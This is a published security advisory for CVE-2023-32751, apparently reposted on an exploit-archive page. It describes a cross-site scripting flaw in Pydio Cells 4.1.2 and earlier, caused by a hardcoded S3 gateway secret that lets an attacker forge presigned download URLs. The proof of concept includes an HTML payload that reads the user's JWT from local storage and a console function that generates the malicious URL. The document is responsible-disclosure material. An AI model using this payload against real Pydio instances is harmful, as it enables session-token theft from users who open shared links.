扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 |
Exploit Title: Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download Affected Versions: 4.1.2 and earlier versions Fixed Versions: 4.2.0, 4.1.3, 3.0.12 Vulnerability Type: Cross-Site Scripting Security Risk: high Vendor URL: https://pydio.com/ Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-004 Advisory Status: published CVE: CVE-2023-32751 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32751 Introduction ============ "Pydio Cells is an open-core, self-hosted Document Sharing and Collaboration platform (DSC) specifically designed for organizations that need advanced document sharing and collaboration without security trade-offs or compliance issues." (from the vendor's homepage) More Details ============ When a file named "xss.html" is downloaded in the Pydio Cells web application, a download URL similar to the following is generated: https://example.com/io/xss/xss.html ?AWSAccessKeyId=gateway &Expires=1682495748 &Signature=920JV0Zy%2BrNYXjak7xksAxRpRp8%3D &response-content-disposition=attachment%3B%20filename%3Dxss.html &pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...] The URL is akin to a presigned URL as used by the Amazon S3 service. It contains the URL parameter "response-content-disposition" which is set to "attachment" causing the response to contain a "Content-Disposition" header with that value. Therefore, the browser downloads the file instead of interpreting it. The URL also contains a signature and expiry timestamp, which are checked by the backend. Unlike a presigned URL as used by S3, the URL also contains the parameter "pydio_jwt" with the JWT of the user for authentication. Furthermore, the access key with the ID "gateway" is referenced, which can be found in the JavaScript sources of Pydio Cells together with the secret: ------------------------------------------------------------------------ _awsSdk.default.config.update({ accessKeyId: 'gateway', secretAccessKey: 'gatewaysecret', s3ForcePathStyle: !0, httpOptions: { timeout: PydioApi.getMultipartUploadTimeout() } }); ------------------------------------------------------------------------ With this information it is possible to change the URL parameter "response-content-disposition" to the value "inline" and then calculate a valid signature for the resulting URL. Furthermore, the content type of the response can be changed to "text/html" by also adding the URL parameter "response-content-type" with that value. This would result in a URL like the following for the previously shown example URL: https://example.com/io/xss/xss.html? AWSAccessKeyId=gateway &Expires=1682495668 &Signature=HpKue0YQZrnp%2B665Jf1t7ONgfRg%3D &response-content-disposition=inline &response-content-type=text%2Fhtml &pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...] Upon opening the URL in a browser, the HTML included in the file is interpreted and any JavaScript code is run. Proof of Concept ================ Upload a HTML file into an arbitrary location of a Pydio Cells instance. For example with the following contents: ------------------------------------------------------------------------ <html> <body> <h1>Cross-Site Scriping</h1> <script> let token = JSON.parse(localStorage.token4).AccessToken; alert(token); </script> </body> </html> ------------------------------------------------------------------------ The contained JavaScript code reads the JWT access token for Pydio Cells from the browser's local storage object and opens a message box. Instead of just displaying the JWT, it could also be sent to an attacker. The following JavaScript function can then be run within the browser's developer console to generate a presigned URL for the HTML file: ------------------------------------------------------------------------ async function getPresignedURL(path) { let client = PydioApi.getClient(); let node = new AjxpNode(path); let metadata = {Bucket: "io", ResponseContentDisposition: "inline", Key: path, ResponseContentType: "text/html"}; let url = await client.buildPresignedGetUrl(node, null, "text/html", metadata); return url; } await getPresignedURL("xss/xss.html"); ------------------------------------------------------------------------ The code has to be run in context of Pydio Cells while being logged in. If the resulting URL is opened in a browser, the JavaScript code contained in the HTML file is run. If the attack is conducted in the described way, the JWT of the attacker is exposed through the URL. However, this can be circumvented by first generating a public URL for the file and then constructing the presigned URL based on the resulting download URL. Workaround ========== No workaround known. Fix === Upgrade Pydio Cells to a version without the vulnerability. Security Risk ============= Attackers that can upload files to a Pydio Cells instance can construct URLs that execute arbitrary JavaScript code in context of Pydio Cells upon opening. This could for example be used to steal the authentication tokens of users opening the URL. It is likely that such an attack succeeds, since sharing URLs to files hosted using Pydio Cells is a common use case of the application. Therefore, the vulnerability is estimated to pose a high risk. Timeline ======== 2023-03-23 Vulnerability identified 2023-05-02 Customer approved disclosure to vendor 2023-05-02 Vendor notified 2023-05-03 CVE ID requested 2023-05-08 Vendor released fixed version 2023-05-14 CVE ID assigned 2023-05-16 Vendor asks for a few more days before the advisory is released 2023-05-30 Advisory released References ========== [1] https://aws.amazon.com/sdk-for-javascript/ RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Alter Posthof 1 Fax : +49 241 510081-99 52062 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen |
体验盒子
